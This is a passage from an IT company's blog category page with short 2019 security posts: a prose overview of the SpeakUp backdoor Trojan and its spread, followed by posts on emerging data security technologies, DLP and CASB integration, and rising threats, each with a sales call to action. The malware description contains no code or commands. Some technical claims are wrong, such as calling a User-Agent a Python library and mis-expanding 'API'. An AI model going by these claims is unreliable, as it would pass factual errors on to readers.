The Central Texas IT Guy

Web Development Austin, SEO Austin, Austin Search Engine Marketing, Internet Marketing Austin, Web Design Austin, Roundrock Web Design, IT Support Central Texas, Social Media Central Texas

Category: Security Page 33 of 75

SpeakUp: A New Malware Threat

By

On June 21, 2019

In Security

SpeakUp is a backdoor Trojan which originally affects Linux distributions and MacOS systems. However, the scope of SpeakUp attack includes any server running ThinkPHP, Hadoop Yarn, Oracle WebLogic and Apache ActiveMQ. It has been named after its command-and-control domain ‘SpeakUpOmaha[dot]com’. SpeakUp exploits remote code execution vulnerabilities to propagate internally within the infected subnet and across new IP ranges. It downloads miners in the infected systems for unauthorized cryptomining.

Mode Of Infection: For introducing the infection vector, SpeakUp takes advantage of the CVE-2018-20062 vulnerability of ThinkPHP. It is a remote command execution vulnerability.

  • The hackers use GET request to send malicious code to the target server. It acts as a PHP shell that executes commands sent by the module parameter in a query.
  • Another HTTP request is sent to the target server to serve as Perl backdoor. It is a standard injection which pulls the Intelligent Input Bus (ibus) payload and stores it on a different location.
  • An additional HTTP request is then sent for launching the backdoor. This request executes the Perl script and deletes the files for eradicating evidence.

Registering A New Victim: On victimizing a server, SpeakUp communicates with its command-and-control domain via POST and GET requests. It uses POST request over HTTP to send the victim ID, current version of installed script and other information to the C&C domain. The domain sends “needrgr” response to the request indicating that it is a new victim & requires registration. The Trojan then forwards complete information of the victim system by running a series of Linux commands.

Functions And Tasks: After registering the victim, the Trojan communicates with its C&C domain at regular intervals known as ‘Knock Interval’ which is 3 seconds. C&C domain commonly uses following commands:

  • “newtask”: It commands the Trojan to execute a code, download & execute a file, uninstall the program and send updated information.
  • “notask”: The command indicates that the Trojan should sleep for ‘Knock Interval’ of 3 seconds and then request for a new task.
  • “newerconfig”: This command indicates the Trojan to update the miner configuration file.

The Trojan defines 3 User-Agents. A User-Agent is a Python library that provides a way to detect devices such as mobile, tablet or a PC. The User-Agents defined by SpeakUp include two MacOS X User-Agents and a hashed string.
Propagation: For further propagation, SpeakUp is loaded with an additional Python script which allows the Trojan to identify, scan and infect other Linux servers within internal & external subnets.

For more information on malware threats and to know how to secure your IT system, call Centex Technologies at (254) 213-4740.

Emerging Data Security Technologies

By

On June 17, 2019

In Security

There has been an exponential increase in cyber-attack instances across the globe. This has led to a need for more advanced data protection and cyber security solutions which can defend organization’s IT systems and can protect business and consumer’s data. In such a scenario, newer technologies play a very important role in providing state-of-the-art data security solutions.

Some of the prominent technologies that are giving rise to possibilities of better data security in future are:

  1. Hardware Authentication: It is easier for hackers to get access to information systems due to inadequate passwords and usernames. This compromises sensitive data and urges the experts to come up with strict authentication methods. One of the ways, to accomplish this, is the development of user hardware authentication. Hardware authentication can be particularly essential for Internet of Things where it is important to ensure that any device seeking connectivity has the authorization to do so.
  2. User Behavior Analytics (UBA): It is a cybersecurity process that detects threats, targeted attacks and financial frauds. It gains information about network events like any kind of malicious behavior by attackers, unauthenticated usernames and passwords, etc. UBA is a valuable tool to train employees for adopting better security practices.
  3. Data Loss Prevention: Encryption of data can protect it on field and sub-field levels. Though any business process can be performed on encrypted data in its protected form, the attackers cannot monetize data even if they conduct a successful breach. For data loss prevention to work well, enterprises should ensure compliance to data privacy and security regulations.
  4. Cloud Technology: Transformation of system security technology will be impacted significantly through the cloud. Users have embraced cloud technology to store vast amount of information that is generated on daily basis. Migration from on-premise data storage and development of information systems security to be used in the cloud is emerging gradually.
  5. Deep Learning: Technologies like deep learning consist of artificial intelligence and machine learning. Experts have a significant deal of interest in these technologies for the purpose of system security. They focus on anomalous behavior as whenever AI and machine learning are fed with right data regarding a potential security threat, decisions are made to prevent attacks depending upon immediate environment without human input. Deep learning techniques have made it possible to analyze different entities that are found in an enterprise both at micro and macro level.

Combination of these new technologies and fundamental security controls can help in ensuring that the confidential information of an organization is safe. For more information on emerging data security technologies, call Centex Technologies at (254) 213-4740.

Reasons To Integrate DLP With Cloud Access Security Broker

By

On May 31, 2019

In Security

Cloud based services play an important role in providing greater flexibility and access to core business applications. However, a major drawback of cloud computing is that the information stored and shared through these systems is highly vulnerable.  To tackle this vulnerability, cloud access security broker (CASB) solutions are being adopted by organizations for protecting data stored in both sanctioned and unsanctioned cloud applications. CASB can be installed on-premises or a cloud-based version of the software can be used as a security layer between the cloud application and service users to monitor the activity & enforce security measures. Another set of tools that is widely used by organizations to prevent data loss is DLP. Data Loss Prevention (DLP) tools classify the regular and critical data & identify security violations.

Cybersecurity firms are integrating CASB and DLP solutions to monitor & control sensitive data. This integration acts as a control point between users, accessible cloud services and the data stored in the cloud. Integrating DLP with Cloud Access Security Broker offers advantages like real time data protection and access management.

Following are other reasons to be considered for integrating DLP with CASB:

  • A rising number of businesses are falling victim to cyber-attacks and data breaches. Cyber criminals are targeting enterprises with malware attacks designed specifically for cloud platforms. They take advantage of loopholes like poor configurations, unauthorized devices and ill-defined access management because IT departments are not able to provide DLP coverage to these blindspots of cloud storage. However, integrating DLP with CASB solutions will help in providing comprehensive DLP coverage to protect sensitive data stored in the cloud.
  • >With the changing cyberattack scenario, it is essential to continually evolve industry’s response to these attacks. Standard network to endpoint workflow should no longer be assumed enough for protection against new and sophisticated malware attacks. Both DLP and CASB may have overlapping features but they fall short on cloud coverage and comprehensive coverage respectively. Thus, it is impossible to get complete cyber security coverage with just one solution. Integrating both solutions provides enhanced coverage to the cloud service users.
  • Integrating DLP and CASB is simple and easy. To integrate with a DLP solution, CASB uses ICAP protocol that sends the content to DLP for review. The DLP inspects files against its existing policies. Once a violation is identified, it sends the violation to the CASB cloud platform via the connector software. The CASB cloud platform enforces remediation action with the cloud service via API.

Most organizations are integrating DLP with CASB as a security standard to protect their data from impending threats.

For more information about IT and security risks, call Centex Technologies at (254) 213-4740.

Reasons To Use VPN

By

On May 29, 2019

In Security

PDF Version: Reasons-To-Use-VPN

Rising Security Threats

By

On May 25, 2019

In Security

Cybersecurity threats are not new; however, they have gained momentum as the intensity and volume of attacks has increased in recent years. A mix of sophisticated old threats and new zero-day attacks have given rise to the need for new cyber security techniques.

In order to formulate effective cyber security strategies, it is important to understand different types of rising security threats:

  1. Insecure API: API refers to Application Programing & User Interface. When an organization sources a cloud service from a service provider, the interface is not used by a single client. It is shared by numerous other users; thus, the organization cannot control the security of interface. As a client, organizations should make sure that the service provider incorporates stringent security measures starting from authentication to encryption.
  2. Direct Data Center & Cloud Attacks: The cyber attackers launch these attacks by locating vulnerabilities in applications and exploiting them to enter a cloud network. Generally exploited vulnerabilities are insecure passwords and lack of proper authentication. Once the cyber attackers gain access, they can move across the applications & data centers freely. Such attacks are not easily spotted by the compromised organizations.
  3. Crypto-jacking: As cryptocurrency is gaining popularity, cryptocurrency attacks are also rising. Crypto-jacking is the term used for unauthentic use of someone’s computer for mining cryptocurrency. The crypto mining code is either encrypted in a link which is sent to the victim via a phishing e-mail or it is loaded in an infectious online ad or website. Once the user clicks on the link, the code is installed on his computer. However, in case of infected ad or website, the code is not loaded on victim’s computer. As the website or ad pops up in victim’s browser, the code is auto-executed. Unlike ransomware, crypto mining code does not harm user’s personal data but uses CPU resources which results in slow processing.
  4. Advanced Persistent Threat (APT): In APT, the hacker breaches a network but stays undetected for a long time; thus, increasing his dwelling period instead of asking for instant ransom. The main motive is to steal information or security data unobtrusively. The breach could be caused by using malware, exploit kits or by piggybacking on legitimate traffic. Once breached, the attackers could steal login credentials to move across the network easily.
  5. IoT Attacks: IoT now includes laptops, tablets, routers, webcams, smart watches, wearable devices, automobiles, home electronics, etc. As IoT is becoming more ubiquitous and number of connected devices is increasing, cyber criminals are targeting the IoT networks for cyber invasions & infections. Once they gain access to a network, cyber criminals can program the devices to create chaos, lock down essential devices for financial ransom, overload the network, etc.

With rising cyber security threats, organizations need to follow strict data management and security practices to protect their data.

For more information about IT and security risks, call Centex Technologies at (254) 213-4740.

© Copyright 2022 The Centex IT Guy. Developed by Centex Technologies
Entries (RSS) and Comments (RSS)